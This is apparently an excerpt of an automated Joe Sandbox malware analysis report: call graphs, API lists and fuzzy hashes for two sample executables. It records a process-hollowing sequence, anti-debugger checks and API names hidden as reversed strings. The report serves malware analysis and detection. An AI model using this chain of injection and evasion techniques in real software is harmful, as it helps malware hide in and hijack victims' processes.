2db9d64 29302->29307 29304 2db89d0 4 API calls 29303->29304 29304->29305 29306 2db89d0 4 API calls 29305->29306 29309 2db9aed 29306->29309 29307->29233 29308 2db89d0 4 API calls 29307->29308 29313 2db9de7 29308->29313 29310 2db89d0 4 API calls 29309->29310 29311 2db9b5e 29310->29311 29440 2db7a2c 29311->29440 29314 2db89d0 4 API calls 29313->29314 29315 2db9e58 29314->29315 29316 2db89d0 4 API calls 29315->29316 29317 2db9f34 29316->29317 29318 2db89d0 4 API calls 29317->29318 29319 2db9fa5 29318->29319 29320 2db89d0 4 API calls 29319->29320 29321 2dba016 29320->29321 29322 2db7d78 3 API calls 29321->29322 29323 2dba033 29322->29323 29324 2db89d0 4 API calls 29323->29324 29325 2dba0a4 29324->29325 29326 2db89d0 4 API calls 29325->29326 29327 2dba115 29326->29327 29328 2db89d0 4 API calls 29327->29328 29329 2dba186 29328->29329 29330 2db7d78 3 API calls 29329->29330 29331 2dba1a6 29330->29331 29332 2db89d0 4 API calls 29331->29332 29333 2dba217 29332->29333 29334 2db89d0 4 API calls 29333->29334 29335 2dba288 29334->29335 29336 2db89d0 4 API calls 29335->29336 29337 2dba2f9 29336->29337 29338 2db89d0 4 API calls 29337->29338 29339 2dba39a 29338->29339 29340 2db89d0 4 API calls 29339->29340 29341 2dba40b 29340->29341 29342 2db89d0 4 API calls 29341->29342 29343 2dba47c 29342->29343 29344 2db89d0 4 API calls 29343->29344 29345 2dba4ed 29344->29345 29346 2db89d0 4 API calls 29345->29346 29347 2dba573 29346->29347 29348 2db894c 3 API calls 29347->29348 29349 2dba587 29348->29349 29350 2db894c 3 API calls 29349->29350 29351 2dba59b 29350->29351 29352 2db894c 3 API calls 29351->29352 29353 2dba5af 29352->29353 29354 2db89d0 4 API calls 29353->29354 29355 2dba620 29354->29355 29356 2db894c 3 API calls 29355->29356 29357 2dba634 29356->29357 29358 2db894c 3 API calls 29357->29358 29359 2dba648 29358->29359 29360 2db894c 3 API calls 29359->29360 29361 2dba69a 29360->29361 29362 2db894c 3 API calls 29361->29362 29363 2dba6ec 29362->29363 29364 2db894c 3 API calls 29363->29364 29365 2dba700 29364->29365 29366 2db894c 3 API calls 29365->29366 29367 2dba714 29366->29367 29368 2db894c 3 API calls 29367->29368 29369 2dba728 29368->29369 29370 2db894c 3 API calls 29369->29370 29371 2dba73c 29370->29371 29372 2db894c 3 API calls 29371->29372 29373 2dba78e 29372->29373 29374 2db894c 3 API calls 29373->29374 29375 2dba7e0 29374->29375 29376 2db894c 3 API calls 29375->29376 29377 2dba832 29376->29377 29378 2db894c 3 API calls 29377->29378 29379 2dba884 29378->29379 29380 2db894c 3 API calls 29379->29380 29381 2dba8a3 29380->29381 29382 2db894c 3 API calls 29381->29382 29382->29233 29383->28766 29385 2da46da 29384->29385 29386->28893 29387->28826 29388->28957 29389->29011 29390->28937 29391->28986 29393 2db8965 29392->29393 29394 2db89a5 29393->29394 29395 2db7d78 3 API calls 29393->29395 29394->29085 29395->29394 29397 2db835b 29396->29397 29398 2db81cc 2 API calls 29397->29398 29399 2db838d 29398->29399 29400 2db8274 GetProcAddress 29399->29400 29401 2db8393 FlushInstructionCache 29400->29401 29402 2db83c1 29401->29402 29402->29199 29404 2db8299 29403->29404 29405 2db82cc GetProcAddress 29404->29405 29406 2db82fb 29405->29406 29406->29208 29408 2db7d9d 29407->29408 29414 2db81cc 29408->29414 29410 2db7dcd 29411 2db8274 GetProcAddress 29410->29411 29412 2db7dd3 NtWriteVirtualMemory 29411->29412 29413 2db7e0c 29412->29413 29413->29210 29415 2db81ef 29414->29415 29416 2db8274 GetProcAddress 29415->29416 29417 2db8215 GetModuleHandleA 29416->29417 29418 2db823b 29417->29418 29418->29410 29420 2db87ab 29419->29420 29421 2db81cc 2 API calls 29420->29421 29422 2db87dd 29421->29422 29423 2db8274 GetProcAddress 29422->29423 29424 2db87e3 CreateProcessAsUserW 29423->29424 29425 2db882f 29424->29425 29425->29253 29427 2db8425 29426->29427 29428 2db81cc 2 API calls 29427->29428 29429 2db8452 29428->29429 29430 2db8274 GetProcAddress 29429->29430 29431 2db8458 NtReadVirtualMemory 29430->29431 29432 2db8493 29431->29432 29432->29281 29434 2db8695 29433->29434 29435 2db81cc 2 API calls 29434->29435 29436 2db86c2 29435->29436 29437 2db8274 GetProcAddress 29436->29437 29438 2db86c8 NtUnmapViewOfSection 29437->29438 29439 2db86f5 29438->29439 29439->29296 29441 2db7a3a 29440->29441 29442 2db81cc 2 API calls 29441->29442 29443 2db7a7e 29442->29443 29444 2db8274 GetProcAddress 29443->29444 29445 2db7a84 NtAllocateVirtualMemory 29444->29445 29446 2db7ac2 29445->29446 29446->29286

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 11001 2db7a2a-2db7a47 11003 2db7a51-2db7a56 11001->11003 11004 2db7a4c call 2da4530 11001->11004 11006 2db7a3a-2db7a4c call 2da4530 11003->11006 11007 2db7a58-2db7ac2 call 2db798c call 2da47ec call 2da49a0 call 2db81cc call 2db8274 NtAllocateVirtualMemory call 2da4500 11003->11007 11004->11003 11006->11003
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E
                                                                                                                    • Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9
                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DB7A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                  • API String ID: 421316089-445027087
                                                                                                                  • Opcode ID: c20ecd23bec3a5cbf5e2e74faf29d1aa2434e5f7bdca76fbfc3e74b0ad1486b1
                                                                                                                  • Instruction ID: 5cbff0670738b111d895c4548ff6a9b9c49fad9d09de46474c0107e353190f96
                                                                                                                  • Opcode Fuzzy Hash: c20ecd23bec3a5cbf5e2e74faf29d1aa2434e5f7bdca76fbfc3e74b0ad1486b1
                                                                                                                  • Instruction Fuzzy Hash: 0A113C75644208FFEB01EFA4EC61EDAB7ADEB49700F414460B906D7340DA70AE548B70

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 11021 2db7a2c-2db7a47 11022 2db7a51-2db7a56 11021->11022 11023 2db7a4c call 2da4530 11021->11023 11025 2db7a3a-2db7a4c call 2da4530 11022->11025 11026 2db7a58-2db7ac2 call 2db798c call 2da47ec call 2da49a0 call 2db81cc call 2db8274 NtAllocateVirtualMemory call 2da4500 11022->11026 11023->11022 11025->11022
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E
                                                                                                                    • Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9
                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DB7A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                  • API String ID: 421316089-445027087
                                                                                                                  • Opcode ID: 385a43df041cf633e03e5b88b786b6a81c0572e794d979741cdeb3d2cd6288ed
                                                                                                                  • Instruction ID: 7a31544ec10ed767d4684e261f53dab55018a6988776d5cf6047202f60eb2321
                                                                                                                  • Opcode Fuzzy Hash: 385a43df041cf633e03e5b88b786b6a81c0572e794d979741cdeb3d2cd6288ed
                                                                                                                  • Instruction Fuzzy Hash: 8B113975684208EFEB01EFA4EC61EDAB7ADEB89700F814460B906D7340DA70AE548B70

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E
                                                                                                                    • Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9
                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DB8471
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleMemoryModuleProcReadVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                  • API String ID: 2004920654-737317276
                                                                                                                  • Opcode ID: e6ab7371d06da01ace5836354d5627694523162e3d53c284c0bedc1951878c3c
                                                                                                                  • Instruction ID: 5d47ac4978f7236fe5d33a1d813a28e2cb1def8fce0aa8ef7de4a6229c014f49
                                                                                                                  • Opcode Fuzzy Hash: e6ab7371d06da01ace5836354d5627694523162e3d53c284c0bedc1951878c3c
                                                                                                                  • Instruction Fuzzy Hash: 35016D75640208EFEB11EFA4EC61E9AB7EEEB48700F514420F906D7340DA74AD149B34

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E
                                                                                                                    • Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9
                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DB7DEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                  • API String ID: 4260932595-3542721025
                                                                                                                  • Opcode ID: e8e7bdd57bd4dad1be1a4827c88cced657a4016d8ce634814862a67d6ddede14
                                                                                                                  • Instruction ID: 67a9fac94f87bdb503b03f10ed59c25bb3c553d32b3a4b83b95e1cb0195a76a1
                                                                                                                  • Opcode Fuzzy Hash: e8e7bdd57bd4dad1be1a4827c88cced657a4016d8ce634814862a67d6ddede14
                                                                                                                  • Instruction Fuzzy Hash: 16012D7A640205EFEB11EF98EC62E9EB7EDEF89B00F514850B802D7740D670AD548B74

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 11070 2db7ac9 11071 2db7a56 11070->11071 11072 2db7a3a-2db7a54 call 2da4530 11071->11072 11073 2db7a58-2db7ac2 call 2db798c call 2da47ec call 2da49a0 call 2db81cc call 2db8274 NtAllocateVirtualMemory call 2da4500 11071->11073 11072->11071
                                                                                                                  APIs
                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DB7A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                  • API String ID: 2167126740-445027087
                                                                                                                  • Opcode ID: f7f0012841a4b920ae9ebc2c61677591b2b71b2270f9583bdca1b5fe85d6db9b
                                                                                                                  • Instruction ID: 33c3e42675878a10e9f2ea37c2cceeea758f47f5e368136d06b8d0deb26fb11c
                                                                                                                  • Opcode Fuzzy Hash: f7f0012841a4b920ae9ebc2c61677591b2b71b2270f9583bdca1b5fe85d6db9b
                                                                                                                  • Instruction Fuzzy Hash: 1C011B76944204EFEB05DF94D961DDEB7ADEF89710F414860B806C7700DA349E54CF64

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E
                                                                                                                    • Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9
                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02DB86D5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                  • API String ID: 2801472262-2520021413
                                                                                                                  • Opcode ID: 15d6bae871c82f4a4ab149fbd04a6b20abbe9cbe3879bdc8d635ec114d73b159
                                                                                                                  • Instruction ID: 47a4abc5be7922061c250086df21d56e3f6c3a261110abbe25209ec6b1f47479
                                                                                                                  • Opcode Fuzzy Hash: 15d6bae871c82f4a4ab149fbd04a6b20abbe9cbe3879bdc8d635ec114d73b159
                                                                                                                  • Instruction Fuzzy Hash: CB014F34A80244EFEB11EFA5ED61E9AB7AEEF49710F914860A402D7740DA74AD449A34

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02DB86D5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SectionUnmapView
                                                                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                  • API String ID: 498011366-2520021413
                                                                                                                  • Opcode ID: 431934125932af58677777e3cd48f322a1672b9246131dad53539bf62662bcaa
                                                                                                                  • Instruction ID: de3fc0af4f35e345a1e4b6c19981752c43c26218c67ec4748efbe9e187d8decd
                                                                                                                  • Opcode Fuzzy Hash: 431934125932af58677777e3cd48f322a1672b9246131dad53539bf62662bcaa
                                                                                                                  • Instruction Fuzzy Hash: 87F0D135941144EFDB01EFB0E9619DDB3EEEF84710F4144A1A806C7700DA74AE09DA20

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E
                                                                                                                    • Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9
                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DB8814
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCreateHandleModuleProcProcessUser
                                                                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                  • API String ID: 4105707577-2353454454
                                                                                                                  • Opcode ID: 0f966190b4ee1d14202c8d6aa43aa73f04ed50a4226d92c8596adbf36d6ab842
                                                                                                                  • Instruction ID: 2c59ab62f2192168cd99b84e7b056fb22bf29111432b55490fe3bb569f86bcf1
                                                                                                                  • Opcode Fuzzy Hash: 0f966190b4ee1d14202c8d6aa43aa73f04ed50a4226d92c8596adbf36d6ab842
                                                                                                                  • Instruction Fuzzy Hash: C211C2B6680248EFEB41EEA9ED61F9A77EDEB0C700F914420BA09D7300C674ED549B24

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 11121 2dbf744-2dbf75e call 2da668c 11124 2dbf78a-2dbf792 11121->11124 11125 2dbf760-2dbf772 call 2da6694 11121->11125 11125->11124 11128 2dbf774-2dbf784 CheckRemoteDebuggerPresent 11125->11128 11128->11124 11129 2dbf786 11128->11129 11129->11124
                                                                                                                  APIs
                                                                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DBF77D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                  • API String ID: 3662101638-539270669
                                                                                                                  • Opcode ID: b794fafc223ae5d7f22b69177c015076fb431a862cab1c02f87700fea03f30c1
                                                                                                                  • Instruction ID: 3828c01171618d43b52ec45b866fc116cb9daa57252e12205680589fb3c70bd0
                                                                                                                  • Opcode Fuzzy Hash: b794fafc223ae5d7f22b69177c015076fb431a862cab1c02f87700fea03f30c1
                                                                                                                  • Instruction Fuzzy Hash: 82F0A771904248FEEB11A7B98C987DCFBA99F05329F2847D0B43662AD1E7714A44CAA1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02DB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DB821E
                                                                                                                    • Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9
                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DB83C2), ref: 02DB83A4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                  • API String ID: 2392256011-184458249
                                                                                                                  • Opcode ID: 61d9d237c5a343639e1843c341fe7bf784b9dd8cc21e6a8d9ba92ba23409a28d
                                                                                                                  • Instruction ID: ed6f074f0882da2de059c638e9eab72202e5cf50b9ef7349e3da205d2f125618
                                                                                                                  • Opcode Fuzzy Hash: 61d9d237c5a343639e1843c341fe7bf784b9dd8cc21e6a8d9ba92ba23409a28d
                                                                                                                  • Instruction Fuzzy Hash: 8C014F71684344EFE711EFA5EC71F9A77ADEB08B00F914460B902D6740DAB4AD549A34
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 02DB82D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc
                                                                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                                                                  • API String ID: 190572456-1372893251
                                                                                                                  • Opcode ID: 92e392bca40b099e883badb86bc41b2e9722b7744498efaf390b2f99540b5504
                                                                                                                  • Instruction ID: 12338e7879b6ef4f2fc54d9c11aea8950ab95a0fe36805b0eb24b0d4546e75a8
                                                                                                                  • Opcode Fuzzy Hash: 92e392bca40b099e883badb86bc41b2e9722b7744498efaf390b2f99540b5504
                                                                                                                  • Instruction Fuzzy Hash: FC018475680344EFEB01EFA4EC61E9AB7EEEB48B00F514460A802D7740DA70AD44CA74
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02DB8274: GetProcAddress.KERNEL32(?,?), ref: 02DB82D9
                                                                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02DB821E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000016.00000002.2320707218.0000000002DA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DA1000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_22_2_2da1000_Wisrysxl.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                  • API String ID: 1646373207-1952140341
                                                                                                                  • Opcode ID: 38ba21dc4975dfc6ea8ed4bbc7a9f9a46a9fa0eb304bb288926c200892fa704c
                                                                                                                  • Instruction ID: 094612f68cb1e84a21b1268938f4634e3444d3079e1de30dd127d3550e1b0d97
                                                                                                                  • Opcode Fuzzy Hash: 38ba21dc4975dfc6ea8ed4bbc7a9f9a46a9fa0eb304bb288926c200892fa704c
                                                                                                                  • Instruction Fuzzy Hash: 55F06271E84704EFEB12EBA5ED31D99B7EDEB4A700B918860E802C3710D670AE149A74

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:27.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:32
                                                                                                                  Total number of Limit Nodes:2

                                                                                                                  Callgraph

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                  • String ID: %s\%s
                                                                                                                  • API String ID: 2742963760-4073750446
                                                                                                                  • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                  • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                  • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                  • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2992075992-0
                                                                                                                  • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                  • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                  • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                  • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1611591150-0
                                                                                                                  • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                  • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                  • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                  • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                  • API String ID: 2803490479-2443507578
                                                                                                                  • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                  • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                  • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                  • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000001.2303257713.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000017.00000001.2303257713.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000001.2303257713.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                  • String ID: D`:vD`:v$D`:vD`:v
                                                                                                                  • API String ID: 4108700736-3916433284
                                                                                                                  • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                  • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                  • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                  • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

                                                                                                                  Execution Graph

